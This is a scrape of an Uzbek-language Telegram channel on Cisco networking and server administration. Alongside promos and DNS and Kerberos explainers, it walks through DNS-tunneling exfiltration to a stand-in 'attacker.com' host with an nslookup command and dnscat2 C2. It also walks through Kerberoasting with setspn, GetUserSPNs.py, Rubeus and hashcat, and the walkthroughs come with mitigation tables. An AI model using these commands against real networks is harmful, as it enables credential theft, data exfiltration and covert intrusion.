Cisco and Server
2.21K subscribers
1.34K photos
280 videos
191 files
808 links
Tarmoq administratorligi (Cisco) va Tizim administratorligi (Server)ni biz bilan o'rganing.
Bularning hammasi @cisco_server kanalida...
Adminlar bilan bog'lanish uchun 👉
Serverlar bo'yicha: @uzbekiston_erkatoyi
Cisco bo'yicha: @ciscoucell va @Dream_0044
Download Telegram
Yangi yilingiz muborak bo'lsin aziz dindoshim.
👍184🎉2👎1
This media is not supported in your browser
VIEW IN TELEGRAM
Yangi yilning ilk kunini yaxshi yangiliklar bilan boshlaylik-a !?

Bugungi birinchi yangilik "Kalmar o'yini"ning so'ngi qismlari ertaga ya'ni 27-iyunda chiqar ekan.

Bu xozircha birinchisi.

Bizni kuzatishni davom eting, yaxshi yangiliklar hali oldinda

@cisco_server
@uzbekona_cisco
🔥4
Cisco and Server
3ta professional videokurs va
💡 “Sohaning yuragi” deb ataladigan kontent sizga tekinga taqdim etiladi!
Yodingizda bo'lsa " Sohaning yuragi bo'lgan" 3-ta darsni sizlar bilan baham ko'raman deb aytgan edim.

Mana o'sha vada qilingan videolarning eng birinchisi: https://t.me/cisco_server/3519

Davomini ham kutayotganlar bormi?

O'zbekona Cisco biz sizning ehtiyojingizni qiziqishga aylantiramiz.
@uzbekona_cisco
@cisco_server
👍6
Media is too big
VIEW IN TELEGRAM
Vada qilingan 2-videoni kutib oling.

Manfaatli bo'ladi degan umiddamiz.

Manfaatli bo'layotgan bo'lsa, Feedback/reaksiya kutib qolamiz.

Biz sizga doim eng yaxshilarini ilinamiz.
@uzbekona_cisco
@cisco_server
👍12🔥31
Ana endi "Ko'k ekran" Chiqmaydi.

Windows 11 larda "Ko'k ekran" ni o'rnini Qora ekran egalladi.

Qani kim birinchi bo'lib qora ekranni o'z ko'zi bilan ko'rsa, shu post ostiga rasmini qoldirsin.

@cisco_server
5😁2👍1
Media is too big
VIEW IN TELEGRAM
Vada qilingan so'ngi video.

Yuqorida berilgan videolarni ko'rdingizmi?
Fikr mulohazalaringiz biz uchun qiziq, ularnmi bizdan ayamang.

O'zbekona Cisco - Biz sizga doim eng yaxshilarini ilinamiz.
@uzbekona_cisco
@cisco_server
🔥3
Youtube da juda yaxshi bir kanalni ko'rib qoldim.
Tarmoq va Tizim administratorligini nazariyasini shunaqa zo'r tushintirishan ekan, ko'rib mazza qildim.
to'g'ri, o'ta chuqur tushintirilmaganu, lekin bemmalol boshlang'ich tushinchani olsa bo'ladigan darajada ekan.

Hullas ming marta eshitdandan bir marta ko'rgan maqqul.

@cisco_server Biz sizga doim eng yaxshilarini ravo ko'ramiz
3👍1
Telegramda schedule qilishdagi BUG sabab 2-iyuldan 5-iyulga qadar postlarni schedule qilib bo'lmayapti.

Siz ham payqadingizmi?

@cisco_server
👍2
📡 DNS qanday ishlaydi? | Misol: uzbekonacisco.uz

Har safar siz brauzerga https://uzbekonacisco.uz deb yozganingizda, bu domen aslida qanday qilib kompyuteringizga IP manzil sifatida yetib keladi?

Keling, bosqichma-bosqich DNS jarayonini ko‘rib chiqamiz:

1️⃣. So‘rov yuboriladi (Query Initiation)
Foydalanuvchi uzbekonacisco.uz saytiga kirishni xohlaydi. Kompyuter bu domen uchun IP manzilni bilmasligi mumkin, shuning uchun DNS so‘rovi boshlanadi.

2️⃣. Lokal xotira (kesh) tekshiriladi
Kompyuter birinchi bo‘lib o‘zining keshida ushbu domen manzili saqlanganmi yoki yo‘qligini tekshiradi. Agar bor bo‘lsa — to‘g‘ridan IP manzilni olib, brauzerga yuboradi.

3️⃣. DNS serverga so‘rov (Recursive Query)
Agar keshda topilmasa, kompyuter o‘ziga o‘rnatilgan DNS serverga (ISPniki yoki Google 8.8.8.8) so‘rov yuboradi.

4️⃣. Root serverlar ishga tushadi
DNS server birinchi bo‘lib Root serverga murojaat qiladi. Root server .uz domeni uchun mas’ul bo‘lgan TLD (Top-Level Domain) server manzilini qaytaradi.

5️⃣. TLD server javob beradi
.uz TLD serveri esa DNS serverga uzbekonacisco.uz domeni qayerda ro‘yxatdan o‘tganini va u bilan bog‘liq vakolatli DNS server manzilini beradi.

6️⃣. Vakolatli DNS serverdan IP olinadi
DNS server endi uzbekonacisco.uz domeniga xizmat qilayotgan asl DNS serverga murojaat qiladi va IP manzilni so‘raydi.

7️⃣. DNS javobni oladi
Vakolatli DNS server uzbekonacisco.uz sayti uchun kerakli IP manzilni (masalan, 195.158.8.21) qaytaradi.

8️⃣. Javob brauzerga yetib keladi
DNS server bu IP manzilni sizning kompyuteringizga yuboradi va brauzeringiz saytga ulanadi.

Natija: Siz uzbekonacisco.uz saytga kirgandek bo‘lasiz, lekin aslida bu orqada 8 ta bosqichda IP topilgan bo‘ladi.

📎 Foydali ma’lumot:
Agar siz bu jarayonni nslookup uzbekonacisco.uz yoki dig uzbekonacisco.uz buyruqlari bilan tekshirsangiz, haqiqiy IP manzil va serverlar haqida ma’lumot olishingiz mumkin.

📣 DNS — internetning yashirin yuragi. Uni tushungan kishi — tarmoqda nima bo‘layotganini to‘liq anglaydi!

O'zbekona Cisco biz sizning ehtiyojingizni qiziqishga aylantiramiz
👍72
🌐 1. Root Serverlar (Root Name Servers)
📌 Nima bu?
Root serverlar — DNS tizimining eng yuqori darajadagi serverlari bo‘lib, ular domen nomi (example.com) qayerga yo‘naltirilishi kerakligini boshlang‘ich nuqtadan aniqlashga yordam beradi.

🧠 Ular nima qiladi?
Foydalanuvchining DNS so‘rovini oladi (masalan: academy.hackthebox.com).

Ushbu domen nomi qaysi TLD server (masalan: .com, .org) ga tegishli ekanini aniqlab beradi.

O‘zida IP-manzil saqlamaydi, faqat keyingi bosqich (TLD server) manzilini ko‘rsatadi.

🌍 Nechta bor?
13 ta Root Server tizimi mavjud (A'dan M'gacha nomlangan).

Har biri ko‘p sonli serverlar va IP manzillarga ega (CDN orqali tarqatilgan).

Ularni boshqaruvchi tashkilotlar: ICANN, Verisign, RIPE, NASA, va boshqalar.

Misollar:
A.root-servers.net (ICANN)

B.root-servers.net (USC-ISI)

C.root-servers.net (Cogent)

O'zbekona Cisco biz sizning ehtiyojingizni qiziqishga aylantiramiz.
@uzbekona_cisco
@cisco_server
👍2
🗂 2. TLD Serverlar (Top-Level Domain Servers)
📌 Nima bu?
TLD serverlar — yuqori darajadagi domenlarga (.com, .uz, .net, .org, .edu) xizmat ko‘rsatadigan DNS serverlar.

🧠 Ular nima qiladi?
Root serverdan yo‘naltirilgan so‘rovni oladi.

Keyin ikkinchi darajali domen (masalan, hackthebox qismi) uchun vakolatli DNS server manzilini beradi.

Misol:
Siz academy.hackthebox.com ga kiryapsiz:

Root server .com domen uchun .com TLD server manzilini beradi.

.com TLD server esa hackthebox.com ning DNS server manzilini ko‘rsatadi.

🔐 Ularni kim boshqaradi?
.com, .net — Verisign

.org — Public Interest Registry

.uz — UZINFOCOM (O‘zbekistondagi .uz domeni uchun)

Har bir TLD’ni alohida tashkilot boshqaradi.

O'zbekona Cisco biz sizning ehtiyojingizni qiziqishga aylantiramiz.
@uzbekona_cisco
@cisco_server
2👍1
🔐 Hujum senariysi: DNS tunneling orqali ma’lumot o‘g‘irlash
🧩 1-bosqich: Tashqi DNS server tayyorlash
Hujumchi o‘zining boshqaruvidagi domenni sotib oladi:

📌 Masalan: attacker.com

So‘ngra, ns1.attacker.com nomli custom DNS server yaratadi (Iodine, dnscat2, OzymanDNS, yoki custom Python skript orqali).

🧠 2-bosqich: Ichki tarmoqdagi qurilmaga zararli dastur joylash
Hujumchi phishing orqali yoki ekspluatatsiya orqali ichki qurilmaga quyidagi vazifani bajaradigan payload joylaydi:

Ma’lumotlarni bo‘laklab (chunk) DNS query’lar ichiga joylaydi.

Masalan: bWFsd2FyZGV4Zmls==.exfil.attacker.com

Bu Base64 bo‘lib, DNS so‘rov subdomain orqali tashqariga yuboriladi.

🌐 3-bosqich: DNS so‘rovlari orqali ma’lumotni yuborish
Zararli dastur nslookup, dig, yoki maxsus kutubxonalar yordamida DNS so‘rov yuboradi:

bash
Copy
Edit
nslookup bWFsZGF0YQ.attacker.com
Ichki DNS forwarder bu so‘rovni internetga uzatadi va u hujumchining DNS serveriga keladi.

Natija: Hujumchi subdomain nomi orqali ma’lumotni DNS orqali oladi, firewalllar esa buni oddiy DNS trafigi deb o‘ylaydi.

💻 4-bosqich: Ma’lumot yig‘ish yoki shell olish
DNS tunneling faqat exfiltration uchun emas, balki teskari aloqa (C2 — Command & Control) uchun ham ishlatiladi. Masalan:

DNS orqali buyruq yuboriladi: cmd.bWQ=.attacker.com

Ichki qurilma uni qabul qilib bajaradi.

Natijani yana subdomain orqali qaytaradi.

🔍 Misol: dnscat2 vositasi
Server: Hujumchining tashqi attacker.com domenida dnscat2-server

Client: Ichki tizimda dnscat2-client

Kanal orqali shell ochiladi: hujumchi ichki tizimga DNS orqali buyruqlar yuboradi va natijani oladi.

🛡 Qarshi choralar (MITIGATIONS)
Choralar Tavsifi
🔒 DNS filtering DNS so‘rov uzunligi, shubhali subdomainlar bo‘yicha filtrlash
📊 SIEM orqali monitoring Uzun, kodlangan yoki tez-tez so‘raladigan DNS nomlarni aniqlash
🚫 DNS tunneling detection tools Zeek (Bro), Splunk, Suricata, Wazuh orqali anomaliyalarni topish
🔐 DNS-over-HTTPS bloklash DNS so‘rovlari VPN yoki HTTPS ichida ketayotganini aniqlash

🧠 Xulosa:
DNS tunneling — ko‘p hollarda firewall va DLP tizimlarini aylanib o‘tish uchun ishlatiladi. Odatda u:

Data exfiltration (ma’lumot o‘g‘irlash)

Command & Control

Bypass detection

uchun xizmat qiladi.

O'zbekona Cisco biz sizning ehtiyojingizni qiziqishga aylantiramiz.
@uzbekona_cisco
@cisco_server
1
Kerberoasting — bu Windows Active Directory (AD) muhitida ishlatiladigan hujum usuli bo‘lib, u orqali hujumchi xizmat (service) hisoblariga tegishli Kerberos chiptalarini (ticket) olib, offline tarzda parolni buzishga (crack) urinadi.

Bu hujum Kerberos autentifikatsiya protokolining xususiyatlaridan foydalanadi.

🔍 Qanday ishlaydi? (Bosqichma-bosqich)
1. Hujumchi tarmoqga kiradi
Hujumchi AD domeniga oddiy foydalanuvchi sifatida tizimga kirgan bo‘ladi (ya’ni ichki hujum).

2. SPN (Service Principal Name) bilan hisoblarni aniqlaydi
setspn -T domain.local -Q */* orqali xizmatlar (service accounts) ro‘yxatini oladi.

Bu hisoblar odatda parollarini almashtirmay ishlatiladigan xizmat hisoblari bo‘ladi.

3. Kerberos’dan TGS chiptani so‘raydi
Request TGS (Ticket Granting Service) orqali xizmatga mos chipta so‘raladi.

Bu chipta xizmat hisobining paroli asosida shifrlangan bo‘ladi.

4. Chipta lokalga saqlanadi va offline “crack” qilinadi
Chiptani hash sifatida saqlaydi (.kirbi fayl bo‘lishi mumkin).

Keyin Hashcat, John the Ripper kabi vositalar orqali parolni bruteforce qiladi.

🧠 Nega ishlaydi?
Kerberos’da TGS chiptalari xizmat hisobining NTLM parol hash'i bilan shifrlanadi.
Agar bu hisob paroli kuchsiz bo‘lsa (masalan: Welcome123!), hujumchi bu hashni offline tarzda tezda buzib olish imkoniga ega bo‘ladi.

🛠 Hujumda ishlatiladigan vositalar:
Rubeus (PowerShell)

Impacket (Python)

hashcat (crack uchun)

GetUserSPNs.py (Impacket tarkibida bo‘ladi)

bash
Copy
Edit
GetUserSPNs.py DOMAIN/username:password -dc-ip 192.168.1.1
🎯 Nima uchun xavfli?
Hujum aniqlanishi qiyin, chunki foydalanuvchi o‘ziga chipta olgani kabi ko‘rinadi.

Parollar offline tarzda buziladi — ya’ni tarmoqdan uzilgan holda.

Ko‘plab tashkilotlarda xizmat hisoblarida kuchsiz parollar bo‘ladi va ular yillar davomida o‘zgartirilmaydi.

🛡 Qarshi himoya choralar
Himoya strategiyalari:
Choralar Tavsif
🔑 Xizmat hisoblari uchun kuchli parollar 20+ belgili, murakkab
🔄 Parollarni davriy o‘zgartirish Har 90 kunda kamida
👤 AES-only Kerberos chiptalar RC4’dan AES256’ga o‘tish
🔍 Kerberos TGS monitoring SIEM’da g‘ayrioddiy TGS so‘rovlar
SPN’li keraksiz hisoblarni o‘chirish Faol bo‘lmagan SPN’lar

🧪 Real hayotdagi misol
Masalan, tashkilotda svc_sql degan xizmat hisobi bo‘lsa, hujumchi:

GetUserSPNs.py orqali SPN’larni topadi.

svc_sql'ga TGS so‘raydi.

Chiptani olib hashcat bilan buzadi.

Parol Sql2023! bo‘lsa, tezda ochiladi.

Endi u bu hisob bilan boshqa serverlarga RDP, PowerShell, SQL orqali kira oladi.

O'zbekona Cisco biz sizning ehtiyojingizni qiziqishga aylantiramiz.
@uzbekona_cisco
@cisco_server
👍2
Kerberos — bu tarmoq orqali xavfsiz autentifikatsiya qilish uchun ishlatiladigan protokol, u biletlarga (ticket) asoslangan va foydalanuvchi parolini tarmoq orqali yubormasdan tizimga kirishni ta’minlaydi.

✈️ Hayotiy misol: Aeroport orqali uchish (Kerberos modeli)
🧍‍♂️ 1. Siz aeroportga kirdingiz – (Login bosqichi)
Siz o‘zingizni tanishtirasiz – pasportingizni ko‘rsatasiz. Bu:

Sizning foydalanuvchi nomingiz va parolingiz

Aeroport xavfsizlik xodimi esa – Authentication Server (AS)

➡️ Agar sizning ma’lumotlaringiz to‘g‘ri bo‘lsa, sizga boarding pass (TGT) beriladi.

🛂 2. Endi siz darvozaga borasiz – (Xizmat so‘rovi)
Sizga endi xizmat kerak – masalan, uchish darvozasiga kirish.

Siz boarding pass (TGT) ni ko‘rsatib, uchish darvozasi chipta (TGS) so‘raysiz.

Bu bosqichda:

Siz — foydalanuvchi

Darvoza xodimi — Ticket Granting Service (TGS)

Uchish — bu xizmat (masalan, SQL Server)

➡️ Sizga uchish uchun maxsus ruxsatnoma (TGS chipta) beriladi.

🛫 3. Siz xizmatga kiryapsiz – (Xizmatga ulanish)
Endi siz darvoza oldida turibsiz. Siz ruxsatnomani (TGS) ko‘rsatasiz va:

Agar hammasi to‘g‘ri bo‘lsa – sizni samolyotga (xizmatga) o‘tkazishadi.

Bu yerda xizmat — masalan, Web server, SQL, file server bo‘lishi mumkin.

🧠 Yodda tutish kerak bo‘lganlar:
Hayotiy misol Kerberosdagi mos narsa
Pasport ko‘rsatish Foydalanuvchi login + parol
Boarding pass TGT (Ticket Granting Ticket)
Darvoza ruxsatnomasi TGS (xizmatga chipta)
Samolyotga o‘tish Xizmatga autentifikatsiyadan o‘tish
Aeroport xavfsizligi KDC (Kerberos serveri)

🔐 Nega bu xavfsiz?
Siz parolni hech qayerda ochiq ko‘rsatmaysiz.

Faqat sizga mos chiptalar bilan tizimga kirasiz.

Har bir chipta vaqt bilan cheklangan – bu esa xavfsizlikni oshiradi.

O'zbekona Cisco biz sizning ehtiyojingizni qiziqishga aylantiramiz.
@uzbekona_cisco
@cisco_server
Kerberos bo'yicha qisqacha.

Hullas

1. Klient ASdan haqiqiyligini tekshirish uchun encrypt ko'rinishida request jo'natadi. Ichida Username va password bo'ladi.

2.AS da username va passwordning hashi saqlanadi.
Clientga TGT jo'natadi.

3. Uni qabul qilgan klient TGSdan ma'lum bir xizmatga ruhsat olish uchun so'rov jo'natadi.

TGT — siz kimligingizni tasdiqlovchi narsa
TGS — qaysi xizmatga kirishga haqligingizni tasdiqlovchi narsa.

TGTdan TGSga SPN orqali jo'natiladi.

TGS ni olgandan keyin mahsus xizmatlarga o'sha parolni heshi orqali kirish imkoni paydo bo'ladi.
1🔥1
Qanday qilib HR xodimlari sizni suhbatga chaqirishga "majbur qilish" mumkinligni bilasizmi?

Umringizda hech bo'lmasa bitta bo'lsa ham , Resume to'ldirgan bo'lsangiz, albatta bu postni o'qib, qilgan xatolaringizni bilib oling.

O'zbekona Cisco biz sizning ehtiyojingizni qiziqishga aylantiramiz.
@uzbekona_cisco
@cisco_server
🔥21👏1
Qanday qilib kerberoasting qilamiz?

1. Windowsdan Rubeus orqali SPNlarni yuklab olamiz biror nom ostida.
2. U SPNni olib linuxda oldindan yuklab olgan rockyou parollarimiz orqali SPN parolini brute force qilamiz.
3. Va jarayon tugagandan keyin, xosil bo'lgan fayl ichidan bizga kerakli user va parol bo'ladi.

Mana shunaqa ko'rinishda tarmog'imizdagi AD userlarining login parolini topib ularning nomidan ish qilishimiz mumkin.

Bu post faqat o'qib o'rganish uchun yozildi, Education purpose only!!!

@uzbekona_cisco
@cisco_server
1